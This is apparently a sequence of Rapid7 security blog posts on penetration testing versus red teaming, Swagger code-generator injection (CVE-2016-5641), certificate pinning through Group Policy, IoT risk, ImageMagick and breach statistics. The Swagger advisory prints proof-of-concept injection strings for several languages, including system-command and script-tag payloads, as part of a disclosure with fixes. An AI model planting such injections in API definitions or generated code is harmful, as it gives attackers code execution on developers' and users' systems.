
Information Security


In a fight between pirates and ninjas, who would win? I know what you are thinking. “What in the world does this have to do with security?” Read on to find out but first, make a choice: Pirates or Ninjas?


Before making that choice, we must know what the strengths and weaknesses are for each:








Pirates

Strengths:

  • Brute-Force Attack
  • Great at Plundering
  • Long-Range Combat

Weaknesses:

  • Drunk (some say this could be a strength too)
  • Can be Careless

Ninjas

Strengths:

  • Dedicated to Training
  • Hand-to-Hand/Sword Combat

Weaknesses:

  • No Armor

It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.


The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.


Penetration Testing


Penetration testing is usually lumped under one big umbrella with all security assessments. Many people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. However, this is a misconception. While they may have similar components, each one is different and should be used in different contexts.


At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk they pose. This does not necessarily mean uncovering new vulnerabilities (zero days); more often it means looking for known, unpatched vulnerabilities. Like Vulnerability Assessments, Penetration Testing is designed to find vulnerabilities and validate that they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but it usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not, or Domain Administrator access alone is not enough.


Who needs a penetration test? Some regulations, such as SOX and HIPAA, require one, but organizations already performing regular internal security audits, and implementing security training and monitoring, are likely ready for a penetration test.


Red Team Assessment


A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could run 3-4 weeks or longer, and often involves multiple people.


A Red Team Assessment does not look for as many vulnerabilities as possible, but only for those vulnerabilities that will achieve its goals. The goals are often the same as those of a Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone, though; it should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.


The Red Team Assessment might consist of the following:


A member of the Red Team poses as a Fed-Ex delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices that will draw attention away from the planted device. The Team members then pivot around the network until they reach their goal, taking their time to avoid detection.


This is just one of the innumerable ways a Red Team may operate, but it is a good example of some tests we have performed.




So... Pirates or Ninjas?


Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer in Penetration Test vs. Red Team is just like pirates vs. ninjas; one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates to perform stealth operations and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how well your incident response works, and you would not want to perform a Red Team Assessment to discover vulnerabilities.

This disclosure addresses a class of vulnerabilities in Swagger code generators in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. This vulnerability applies to NodeJS, PHP, Ruby, and Java, and probably other languages as well. Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can inject arbitrary code into a client or server that is generated automatically to interact with the definition of service. This is considered an abuse of trust in the definition of service, and could be an interesting space for further research.


According to the project's own description: “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.”


Within the Swagger ecosystem, there are fantastic code generators which are designed to automagically take a Swagger document and then generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to provide developers the ability to quickly make use of their APIs. The Swagger definitions are flexible enough to describe most RESTful APIs and give developers a great starting point for their API client. The problem discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document, which results in a classic parameter injection with a new twist on code generation.
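For context, here is a minimal, benign Swagger 2.0 document (a hypothetical "petstore" example); the `info` and `paths` fields it defines are exactly the ones the malicious documents below abuse:

```json
{
  "swagger": "2.0",
  "info": {
    "title": "Petstore",
    "description": "A sample API",
    "version": "1.0.0"
  },
  "paths": {
    "/pets": {
      "get": {
        "responses": {
          "200": { "description": "OK" }
        }
      }
    }
  }
}
```

A code generator walks `info` and `paths` to emit a client; the attack simply replaces these innocuous strings with code fragments.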


Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is achieved by the fact that some parsers/generators trust insufficiently sanitized parameters within a Swagger document to generate a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source projects and public services, as well as commercial products such as restlet-studio. These services appear to generate and store the resulting artifacts (but not execute them), and the artifacts can be publicly downloaded and consumed. Remote code execution is achieved when the downloaded artifact is executed on the target.

Server Side

Online services that consume Swagger documents and automatically generate and execute server-side applications, test specs, and mock servers provide a potential for remote code execution. Several commercial platforms that follow this model were identified.


These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.


Please see the associated Metasploit exploit module for examples for the following languages.


Swagger-codegen generates client and server code based on a Swagger document, which it trusts to supply values that are placed into code unescaped (i.e., unescaped handlebars template variables). The javascript, html, php, ruby and java clients were tested for parameter injection vulnerabilities; examples are given as follows.
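To make the bug class concrete, here is a deliberately naive, hypothetical generator (not swagger-codegen's actual template engine) that substitutes a Swagger path key into source code without escaping; a crafted key terminates the string literal and injects a statement:

```python
# Hypothetical, deliberately naive code generator illustrating the bug class:
# a Swagger path key is dropped into source code with no escaping.
TEMPLATE = "function callApi() {{ var url = '{path}'; return url; }}"

def naive_generate(path_key):
    # No sanitization: whatever the Swagger document contains lands in the code.
    return TEMPLATE.format(path=path_key)

benign = naive_generate("/pets")
# A malicious key terminates the string literal and injects a statement.
malicious = naive_generate("/a'; console.log('RCE'); var x = '")

print(benign)
print(malicious)
```

The benign key yields an ordinary function; the malicious key produces generated code with an embedded statement, which is exactly the pattern the language-specific payloads below exploit.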

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {



html

Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",



php

Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",



ruby

Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\"`"


java

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 



Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.


Fixes need to be implemented by those creating code generation tools; in general, this does not apply to the Swagger documents themselves. The mitigation for all of these issues is to properly escape parameters before injecting them, taking into account the context in which each variable is used in the generated code, so that a trusted API specification cannot lead to generated code containing remote code execution in these known, easily avoidable cases.


For example, using double braces ({{ }}) instead of triple braces ({{{ }}}) in handlebars templates will usually prevent many types of injection attacks that involve single or double quote termination; however, this will not stop a determined attacker who can inject variables without sanitization logic into multi-line comments, inline code, or variables.


Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable depending on template and sanitization logic
  • {{ code }} can be vulnerable depending on the template's context language (e.g. inside a block comment)

Where to be wary

  • inline code creation from variable
  • unescaped variable injection into single ticks (') and quotes (")
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ' in single-quoted path strings
  • encode " in double-quoted path strings


It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.


Future of Swagger

On January 1st, 2016, the Swagger Specification was donated to the Open API Initiative (OAI) and became the foundation of the OpenAPI Specification. However, ‘Swagger’ is still the preferred name at many a dinner party and in many a dad joke, and it is used in this document to refer to an OAS 2.0 specification document. In the typical case, a Swagger document defines a RESTful API. It implements a subset of JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.


So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.


Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.


Our product teams here at Rapid7 are alert to this news, and will be working up solutions in Nexpose and Metasploit to cover this vulnerability; this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your Flash vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network.


When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?


While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own using Project Sonar, and we now have the tooling not only to answer these fundamental questions about the nature of the internet, but also to come up with more precise questions for specific lines of inquiry.


Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet servers out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used.
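To illustrate the kind of tally behind a top-ten list like that, here is a toy sketch over hypothetical (port, country) scan records; the real National Exposure dataset is of course vastly larger:

```python
from collections import Counter

# Hypothetical (port, country) scan records standing in for Sonar output.
records = [
    (80, "US"), (443, "US"), (23, "CN"), (23, "US"),
    (22, "DE"), (80, "CN"), (23, "PL"), (443, "HK"),
]

# Tally which TCP services are offered most often.
top = Counter(port for port, _ in records).most_common(3)
print(top)
```

In this toy data, telnet (port 23) would already edge out HTTP and HTTPS, echoing the kind of surprise the real survey turned up.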


We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.


It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.

So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.


In the enterprise, with services exposed to the Internet and employees traveling, working from Wi-Fi and other insecure connections, this is also a very important issue, as the use of some of these less than tasteful certificates could lead to data (and credential!) interception.


Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.


Untrusting Certificate Authorities on Windows via GPO


Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.


While there are legitimate uses to these features in the enterprise, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time, and will probably not be the last time something like this happens, so being ready to revoke certificate authorities is an ability enterprises must have.


Filippo also posted a great tutorial on how to revoke it on OS X and now links to Windows instructions but this article also covers pinning and goes into a bit more detail.


In this post, we will look at doing it on Windows, in an Active Directory environment.


Whitelist Versus Blacklist


Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective: you would keep full control of the approved authorities. However, that whitelist approach requires additional management effort, since it involves replacing the certificates on all systems via GPO, and it risks breaking custom certificates installed for legitimate purposes. That should be a longer-term goal; a blacklist approach can be used right away.


In this case, start by downloading the certificate you want to block as a .crt file.


Create A Group Policy Object (GPO)


You could use an existing GPO or create a new one. The important thing to consider is that this will be a computer policy, which should be linked to the OUs where your workstations are located. As with any GPO change, it is highly recommended to first link and filter this policy to specific testing workstations, considering that a mistake could end up breaking SSL/TLS connectivity on workstations.




Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.




The first wizard screen has greyed out options, as we are modifying a GPO. On the second one, simply browse to the CRT you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.


At this point, your GPO should look like this, and is ready to block this certificate from the Windows store on all machines where it is deployed.




Pinning Certificate Authorities Via GPO


Revoking known bad certificates is one thing, but a very reliable way to ensure bad certificates have no impact on corporate services is to pin them. Pinning essentially configures the client device to only accept known good values for pre-configured SSL/TLS communications.


Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.
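Conceptually, pinning at either granularity reduces to comparing the SHA-1 thumbprint of a presented certificate (or of its issuing authority) against a stored list of known-good values. A rough sketch, with hypothetical helper names and a placeholder thumbprint:

```python
import hashlib

def sha1_thumbprint(der_bytes):
    # A Windows-style "thumbprint" is the SHA-1 digest of the DER-encoded
    # certificate, usually displayed as uppercase hex.
    return hashlib.sha1(der_bytes).hexdigest().upper()

# Hypothetical pin list: known-good CA thumbprints per service, reusing the
# placeholder value from the EMET example in this post.
PINNED = {"example.com": {"OBVIOUSLYNOTAREALTHUMBPRINT"}}

def is_pinned(host, der_bytes):
    # Accept the certificate only if its thumbprint matches a pinned value.
    return sha1_thumbprint(der_bytes) in PINNED.get(host, set())
```

EMET performs this comparison for you per the rules configured below; the sketch only shows why a forged-but-trusted certificate still fails the check.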


This would allow us to configure systems to only expect, for example, that communications to the Rapid7 website should use GoDaddy certificates.




By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments, or even malicious attacks at the ISP level would require forging a certificate from that very specific authority, and would prevent the use of another illegitimate yet trusted certificate.


Deploy EMET


Deployment of EMET has already been covered briefly in our Whiteboard Wednesdays, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates, and while other EMET mitigations are great for security, they are not covered in this post, which focuses only on certificate management.


Create A GPO For EMET


Again, a policy that applies to the appropriate computer objects must be created.


EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.


1. Copy the ADMX to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML to  <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Template\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all URLs you want to protect, as well as the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the thumbprints (SHA-1) of the certificates to accept, or of their authorities. These rules can get very granular, including expiration dates and more - please read the examples provided by Microsoft if you would like to use such advanced rules. When starting out, the EMET GUI can show you the types of rules that can be created more easily than editing those relatively unfriendly GPOs.

8. In our example, we configure the rule to trust only a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT, as a blocking rule that expires on Christmas 2020.




9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule being applied, denoted by the icon showing it is coming from a GPO.



10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate were at play in a man-in-the-middle attack.




11. EMET logs an error to the Event Log, which you should absolutely detect and investigate.




12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, and SaaS providers. Additional protection for social network accounts can also be achieved this way.


Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules to obtain better coverage. Again, this is the type of change that should be tested very well before being pushed to a significant number of workstations, but once done, you will have significantly reduced the chances of a man-in-the-middle attack and improved the odds of detecting one.


Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week about "doing data science" at "internet scale", and about how you can get started doing security data science at home or in your organization. So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away, and what information lies hidden in this seemingly innocuous square:



This blog post was written by Bob Rudis, Chief Security Data Scientist and Deral Heiland, Research Lead.


Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.




As organizations continue down the path of adoption of IoT solutions into their environments they are faced with a number of hard questions, and in some ways they may not always know what those questions are. In an attempt to help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.


  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? ( i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)


What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. By default, these devices are on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.


Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look at the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed without your knowledge that may not have shown up on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.


Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient being able to deploy cameras or control environmental systems within a building or campus by using modern network protocols and spiffy apps. But do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things,” quickly followed by “what value does this bring to our organization?” If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit, or consider deploying the technology in an isolated environment with strong access controls to limit or prevent connectivity to the organization's internal systems.


There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."


How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?


Most of these are standard questions on any new technology adoption within an organization. One issue with communications and IoT devices is that their makers tend to not have enterprise deployments in mind and the vast majority require direct internet connections, communicate without encryption and use new, low-power communication technologies to transmit data and control commands in clear text.


An advertised feature of many IoT devices is that they store your data in “the cloud.” Every question you currently ask about cloud deployments in your organization applies to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool.”


To get answers to these questions, don’t just trust the manufacturer. Run your own proof-of-concept deployment in a controlled environment and monitor all communications as you change settings. Your regulatory requirements, or just internal policy requirements, may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.


How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease-of-use is aimed at casual consumers, but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work.” This means many devices will have no password, or use only a simple static password, versus the more detailed or elaborate controls that you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. And if you think access control is weak, consider that most also have no concept of encryption on any communication channel. If the built-in controls do not conform with your standard requirements, consider isolating the “management” side within a separate network - if that’s possible.


IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.


What is the classification of the data?

Another key action to perform when deciding on an IoT solution is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it within defined categories, we can better control how the data is gathered, transmitted, and stored within our environment. This will also help us make better-informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policies and procedures are important to all businesses to assure that all data is being properly handled within the organization. If you do not have such a practice, it is highly recommended that one be developed and that IoT data be included in those policies and procedures.


The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.


Can we monitor and maintain these IoT devices?

Unlike servers, routers, switches, and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. Often the only monitoring on offer is a notice when a device fails to phone home or fails to upload data within a preset time interval. Expecting to use SNMP or an SSH connection to gather management telemetry is not an assumption you should make lightly. Verify and test management options before committing to a solution.


Patch management is also a critical concern when dealing with IoT technology. Here we have to consider the full ecosystem of the IoT solution deployed, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all segments are included in a comprehensive patch management solution can be difficult. Depending on the IoT technology deployed, vendor-automated patching may not be available; if that is the case, a self-managed solution will need to be implemented.


What are the failure modes?

Often overlooked when considering the deployment of any technology, but especially with IoT: what happens if the technology fails to operate correctly? Can the business proceed without these services, and does a failure lead to a security breakdown or loss of critical data? Where it does, it is important to identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancies.


If you have no current process in place to analyze failure modes, a great place to start is a cyber-oriented failure mode and effects analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify the outcomes of scenarios and help combat the urge to “make a gut call” when considering the possible negative outcomes of IoT deployments.


How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it, and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits within the parameters of your current threat models, and expand them only if you absolutely have to.


The Internet of Things holds much promise, profit, and progress, but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but we should do so in the safest and most secure ways possible. We hope these questions help you better assess the risk of the IoT you have already deployed and the IoT you will be adopting.


[1] Security Framework for Control System Data Classification and Protection: k_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=

[3] The OpenFAIR body of knowledge:

ImageMagick Vulnerabilities and Exploits


On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs resource usage by ImageMagick components.


Essentially, the ImageMagick vulnerabilities are a combination of a type confusion vulnerability (where the ImageMagick components do not correctly identify a file format) and a command injection vulnerability (where the filtering mechanisms guarding against shell escapes are insufficient).


How worried should I be?


The reason for the public disclosure in the first place is that the vulnerabilities are already being exploited by unknown actors, as reported by Ryan Huber. As he predicted, exploits by security researchers targeting the affected components emerged in short order, including a Metasploit module authored by William Vu and HD Moore.


As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.


What's next?


Website operators should immediately determine their use of ImageMagick components in image processing, and implement the referenced policy.xml mitigation while awaiting updated packages that fix the identified vulnerabilities. Restricting the file formats accepted by ImageMagick to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for sites where it makes sense to do so: ImageMagick parses hundreds of file formats, which is part of its usefulness but also part of its attack surface.
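As a sketch of what that mitigation looks like, a restrictive policy.xml along the lines circulated with the disclosure disables the coders implicated in the command injection vector. Verify the exact coder list against the official forum post before deploying, since the recommendation evolved as the vulnerabilities were analyzed:

```xml
<policymap>
  <!-- Deny the indirect-read coders abused for command injection -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
```

This file typically lives at /etc/ImageMagick/policy.xml, though the path varies by distribution and ImageMagick version.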


Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers has, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.


The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.


Bigger is…Better?


There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:



We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:



We can also take another, discrete view of this by industry:




(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")


As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident to breach ratio (you are using VERIS to record and track everything from anti-virus hits to full on breaches, right?) and compare it to the corresponding industry/size.


The Single Most Popular Valuable Chart In The World! (for defenders)


When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:



We smoothed out the rough edges from the 2016 Verizon Data Breach Report figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap:




Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"


